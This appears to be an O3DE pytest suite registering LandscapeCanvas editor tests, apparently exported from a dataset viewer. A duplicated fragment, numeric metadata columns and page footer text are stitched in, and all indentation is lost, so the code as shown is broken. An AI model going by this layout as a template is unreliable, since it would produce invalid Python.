class test_LandscapeCanvas_GradientNodes_DependentComponentsAdded(EditorSharedTest):
from .EditorScripts import GradientNodes_DependentComponentsAdded as test_module
class test_LandscapeCanvas_GradientNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
from .EditorScripts import GradientNodes_EntityCreatedOnNodeAdd as test_module
class test_LandscapeCanvas_GradientNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
from .EditorScripts import GradientNodes_EntityRemovedOnNodeDelete as test_module
@pytest.mark.xfail(reason="https://github.com/o3de/o3de/issues/2201")
class test_LandscapeCanvas_GraphClosed_OnEntityDelete(EditorSharedTest):
from .EditorScripts import GraphClosed_OnEntityDelete as test_module
class test_LandscapeCanvas_GraphClosed_OnLevelChange(EditorSharedTest):
from .EditorScripts import GraphClosed_OnLevelChange as test_module
class test_LandscapeCanvas_GraphClosed_TabbedGraphClosesIndependently(EditorSharedTest):
from .EditorScripts import GraphClosed_TabbedGraph as test_module
class test_LandscapeCanvas_GraphUpdates_UpdateComponents(EditorSharedTest):
from .EditorScripts import GraphUpdates_UpdateComponents as test_module
class test_LandscapeCanvas_LayerBlender_NodeConstruction(EditorSharedTest):
from .EditorScripts import LayerBlender_NodeConstruction as test_module
class test_LandscapeCanvas_LayerExtenderNodes_ComponentEntitySync(EditorSharedTest):
from .EditorScripts import LayerExtenderNodes_ComponentEntitySync as test_module
class test_LandscapeCanvas_NewGraph_CreatedSuccessfully(EditorSharedTest):
from .EditorScripts import NewGraph_CreatedSuccessfully as test_module
class test_LandscapeCanvas_Prefab_CreateInstantiate(EditorSharedTest):
from .EditorScripts import Prefab_CreateInstantiate as test_module
class test_LandscapeCanvas_ShapeNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
from .EditorScripts import ShapeNodes_EntityCreatedOnNodeAdd as test_module
class test_LandscapeCanvas_ShapeNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
from .EditorScripts import ShapeNodes_EntityRemovedOnNodeDelete as test_module
class test_LandscapeCanvas_SlotConnections_UpdateComponentReferences(EditorSharedTest):
from .EditorScripts import SlotConnections_UpdateComponentReferences as test_module
| 52.522727 | 114 | 0.844656 |
import pytest
from ly_test_tools.o3de.editor_test import EditorSingleTest, EditorSharedTest, EditorParallelTest, EditorTestSuite
@pytest.mark.parametrize("launcher_platform", ['windows_editor'])
@pytest.mark.parametrize("project", ["AutomatedTesting"])
class TestAutomation(EditorTestSuite):
class test_LandscapeCanvas_AreaNodes_DependentComponentsAdded(EditorSharedTest):
from .EditorScripts import AreaNodes_DependentComponentsAdded as test_module
class test_LandscapeCanvas_AreaNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
from .EditorScripts import AreaNodes_EntityCreatedOnNodeAdd as test_module
class test_LandscapeCanvas_AreaNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
from .EditorScripts import AreaNodes_EntityRemovedOnNodeDelete as test_module
class test_LandscapeCanvas_Component_AddedRemoved(EditorSharedTest):
from .EditorScripts import Component_AddedRemoved as test_module
class test_LandscapeCanvas_ComponentUpdates_UpdateGraph(EditorSharedTest):
from .EditorScripts import ComponentUpdates_UpdateGraph as test_module
class test_LandscapeCanvas_Edit_DisabledNodeDuplication(EditorSharedTest):
from .EditorScripts import Edit_DisabledNodeDuplication as test_module
class test_LandscapeCanvas_Edit_UndoNodeDelete_PrefabEntity(EditorSharedTest):
from .EditorScripts import Edit_UndoNodeDelete_PrefabEntity as test_module
class test_LandscapeCanvas_GradientMixer_NodeConstruction(EditorSharedTest):
from .EditorScripts import GradientMixer_NodeConstruction as test_module
class test_LandscapeCanvas_GradientModifierNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
from .EditorScripts import GradientModifierNodes_EntityCreatedOnNodeAdd as test_module
class test_LandscapeCanvas_GradientModifierNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
from .EditorScripts import GradientModifierNodes_EntityRemovedOnNodeDelete as test_module
class test_LandscapeCanvas_GradientNodes_DependentComponentsAdded(EditorSharedTest):
from .EditorScripts import GradientNodes_DependentComponentsAdded as test_module
class test_LandscapeCanvas_GradientNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
from .EditorScripts import GradientNodes_EntityCreatedOnNodeAdd as test_module
class test_LandscapeCanvas_GradientNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
from .EditorScripts import GradientNodes_EntityRemovedOnNodeDelete as test_module
@pytest.mark.xfail(reason="https://github.com/o3de/o3de/issues/2201")
class test_LandscapeCanvas_GraphClosed_OnEntityDelete(EditorSharedTest):
from .EditorScripts import GraphClosed_OnEntityDelete as test_module
class test_LandscapeCanvas_GraphClosed_OnLevelChange(EditorSharedTest):
from .EditorScripts import GraphClosed_OnLevelChange as test_module
class test_LandscapeCanvas_GraphClosed_TabbedGraphClosesIndependently(EditorSharedTest):
from .EditorScripts import GraphClosed_TabbedGraph as test_module
class test_LandscapeCanvas_GraphUpdates_UpdateComponents(EditorSharedTest):
from .EditorScripts import GraphUpdates_UpdateComponents as test_module
class test_LandscapeCanvas_LayerBlender_NodeConstruction(EditorSharedTest):
from .EditorScripts import LayerBlender_NodeConstruction as test_module
class test_LandscapeCanvas_LayerExtenderNodes_ComponentEntitySync(EditorSharedTest):
from .EditorScripts import LayerExtenderNodes_ComponentEntitySync as test_module
class test_LandscapeCanvas_NewGraph_CreatedSuccessfully(EditorSharedTest):
from .EditorScripts import NewGraph_CreatedSuccessfully as test_module
class test_LandscapeCanvas_Prefab_CreateInstantiate(EditorSharedTest):
from .EditorScripts import Prefab_CreateInstantiate as test_module
class test_LandscapeCanvas_ShapeNodes_EntityCreatedOnNodeAdd(EditorSharedTest):
from .EditorScripts import ShapeNodes_EntityCreatedOnNodeAdd as test_module
class test_LandscapeCanvas_ShapeNodes_EntityRemovedOnNodeDelete(EditorSharedTest):
from .EditorScripts import ShapeNodes_EntityRemovedOnNodeDelete as test_module
class test_LandscapeCanvas_SlotConnections_UpdateComponentReferences(EditorSharedTest):
from .EditorScripts import SlotConnections_UpdateComponentReferences as test_module
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.